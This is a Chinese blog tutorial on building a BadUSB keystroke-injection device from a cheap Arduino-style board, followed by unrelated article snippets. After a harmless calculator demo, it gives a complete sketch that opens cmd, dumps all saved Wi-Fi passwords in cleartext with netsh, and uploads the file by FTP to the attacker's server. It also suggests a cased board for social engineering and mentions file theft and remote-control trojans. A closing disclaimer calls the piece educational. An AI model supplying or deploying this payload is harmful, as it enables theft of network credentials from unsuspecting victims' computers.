BadUSB制作-详细指南

因为一些因素,所以近期接触到了badusb,官方话还是要说,科普话也同样要说

“BadUSB”是计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在BlackHat安全大会上公布。BadUSB号称是世界上最邪恶的USB外设。

首先买了一块板子,没错就是这种三四十块的,虽然外形很难让人接受,如果做社工的话建议多花十块,买个带壳子的!

开发工具,没错就是这货

插入我们买的板子,点击工具-获取开发板信息

然后再工具,选择我们刚刚得到的信息

好了   准备工作已经齐活了。开始工作吧

先简单的举一个弹计算器的例子

#include <Keyboard.h>
void setup() {
Keyboard.begin();//开始键盘通讯
delay(1000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press(‘r‘);//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release(‘r‘);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CALC");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}

void loop()//循环
{

}

  点击1,再点击2

这个时候就一个badusb就已经制作好了,插入电脑后会自动打开计算器

---------------------------分割线------------------------------------

这都是比较低级的,还能做什么呢?像窃取文件啦。木马远控了

不过这些就需要配合一些其他的东西。就是一个虚拟主机,淘宝上也是十几块钱吧

以wifi密码窃取为例

让我们先看一下代码

#include <Keyboard.h>
void setup() {
Keyboard.begin();//开始键盘通讯
delay(1000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press(‘r‘);//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release(‘r‘);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.print(F("for /f \"skip=9 tokens=1,2 delims=:\" %i in (‘netsh wlan show profiles‘) do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear >>d:/wifi.txt"));//这段代码的功能是把你电脑保存的wifi密码输出出来。保存到一个txt文件里面delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK); //这里我关闭了大小写
delay(500);
Keyboard.press(KEY_LEFT_SHIFT); //现在的输入法默认的都是开机自启汉字选项,我利用shift给他切换一下
Keyboard.release(KEY_LEFT_SHIFT);
delay(500);
Keyboard.print(F("ftp xxxxxxxx")); //这是你的ftp服务器地址
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.print(F("xxxxxx"));  //用户名
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.print(F("xxxxxx"));  //密码
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.print(F("put d:/wifi.txt")); //上传刚才的wifi文件
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.print(F("bye"));
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.print(F("exit"));//结束
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.end();//结束键盘通讯
}

void loop()//循环
{

}

  

这个时候电脑保存的密码就上传到了你的服务器上   
----------------------------分割--------------------------

现在网上的好多源码是不同语言写的,比如这样

这是一个在线的转换网站
http://www.lotqu.com/script.html

不过转换结束之后他的源代码是

type  KEY_RETURN

  

这代表着是按回车键,松开回车键,但是在这个编辑器中是无法编译的,需要修改为一下的形式

Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);

-------------------------------分割------------------------

多实验几次  。弄点其他的花样,其实这个就是模拟一个键盘的操作,可以说能作非常多的事
 --------------------------------分割线------------------------------------------

不要做坏事,本文章仅供教学了解。请不要做非法的事情。

时间: 2024-10-30 00:18:27

BadUSB制作-详细指南的相关文章

Sublime Text 3 全程详细指南(持续更新中。。。)

一. 前言 使用Sublime Text 也有几个年头了,版本也从2升级到3了,但犹如寒天饮冰水,冷暖尽自知.最初也是不知道从何下手,满世界地查找资料,但能查阅到的资料,苦于它们的零碎.片面,不够系统和全面,所以一路走来,耗费了本人大量的时间和精力.所以蒙生了写这篇<Sublime Text 3 全程详细指南>,一来对自己的经验是一个总结,二来可以为初学者做个系统.全面的指引,让他们少走我当时走过的弯路,从而能快速地掌握Sublime Text这个优秀的编辑器. 目前我正在使用的版本是Subl

三小时学会Kubernetes:容器编排详细指南

三小时学会Kubernetes:容器编排详细指南 如果谁都可以在三个小时内学会Kubernetes,银行为何要为这么简单的东西付一大笔钱? 如果你心存疑虑,我建议你不妨跟着我试一试!在完成本文的学习后,你就能在Kubernetes集群上运行基于微服务的应用程序.我之所以能保证这一点,是因为我就是这么向客户介绍Kubernetes的. 这份指南与其他文章有何不同之处? 相当多!大多数指南是从Kubernetes概念和kubectl命令这类简单的东西开始的.它们假定读者熟悉应用程序开发.微服务和Do

数据泄露防护- BadUSB制作模拟

1. 什么是BadUSB 找度娘/谷歌爷爷 2. 参考网站 https://github.com/adamcaudill/Psychson/wiki/Known-Supported-Devices https://github.com/adamcaudill/Psychson (有具体制作BadUSB的流程说明) 3. 必要工具 badusb支持的USB:<https://github.com/adamcaudill/Psychson/wiki/Known-Supported-Devices >

HTML5游戏制作完全指南

简介 创建画布 游戏循环 Hello world 创建player 键盘控制 a:使用jQuery Hotkeys b:移动player 添加更多游戏元素 炮弹 敌人 使用图片 碰撞检测 声音 简介 你想使用HTML5的Canvas制作一款游戏吗?跟着这个教程,你将立刻上道儿. 阅读该教程需要至少熟悉javascript相关知识. 你可以先玩这款游戏或者直接阅读文章并且下载游戏源码. 创建画布 在画任何东西之前,我们必须创建一个画布.因为这是完全指南,并且我们将用到jQuery. var CAN

APNS远程推送证书的申请和制作——详细解析

发表于6个月前(2014-08-04 17:57)   阅读(1708) | 评论(7) 4人收藏此文章, 我要收藏 赞3 摘要 我们的手机每天会被很多通知轰炸,那么,这些通知是怎么弄出来的呢,下面为大家详细解析 APNS 远程推送 目录[-] 一.远程推送的原理 二.在程序上注册远程通知 三.申请推送证书 1.申请本地证书: 2.在开发者网站上申请证书 四.申请描述文件(开发和发布描述文件) 五.为服务器制作证书 1.准备p12文件 2.将下载的证书制作成.pem 文件 3.将.p12 证书制

Redis 集群搭建详细指南

先有鸡还是先有蛋? 最近有朋友问了一个问题,说毕业后去大城市还是小城市?去大公司还是小公司?我的回答都是大城市!大公司!为什么这么说呢,你想一下,无论女孩男孩找朋友都喜欢找个子高胸大的.同样的道理嘛,「大」总有大的好.当然,如果你要有能力找一个胸大个子高就更完美了. Redis 集群简介 Redis 是一个开源的 key-value 存储系统,由于出众的性能,大部分互联网企业都用来做服务器端缓存.Redis 在3.0版本前只支持单实例模式,虽然支持主从模式.哨兵模式部署来解决单点故障,但是现在互

雕刻机制作 PCB 指南

之前使用过感光蓝油制作过 PCB,虽然感光法精度高,但个人制作耗时耗力,发给厂家周期又很长.看到国外的网友使用雕刻机制作 PCB  视频之后.几番周折之后还是成功了.有感于网上几乎没有一份完整的雕刻机法制作 PCB 的资料.撰写此文的目的就是希望其他使用雕刻机制作 PCB 的朋友不要像我一样把时间浪费在折腾工具上面. 这里我们使用雕刻机制作 PCB,俗话说,工欲善其事,必先利其器,首先罗列下需要的工具和软件. 工具准备: 1. 雕刻机及配套电脑和软件(我这里用的 Mach3) 2. 覆铜板 3.

Android创建和使用数据库详细指南(1)

打印一个对象:NSLog(@"%@", stu); 默认情况下打印的时对象的名字和内存地址:这时需要重写description方法 // 重写description方法 - (NSString *)description { return [NSString stringWithFormat:@"title:%@,icon:%@,answer:%@,options:%@", self.title, self.icon, self.answer, self.optio

redis-cluster 集群搭建详细指南及常见问题集合

只当个搬运工吧 搭建篇:https://www.cnblogs.com/mafly/p/redis_cluster.html  测试能用 常见问题: 1 redis操作key时出现以下错误 (error) MOVED 5798 127.0.0.1:7001 https://www.fashici.com/tech/356.html 2.ERR] Not all 16384 slots are covered by nodes. https://blog.csdn.net/vtopqx/artic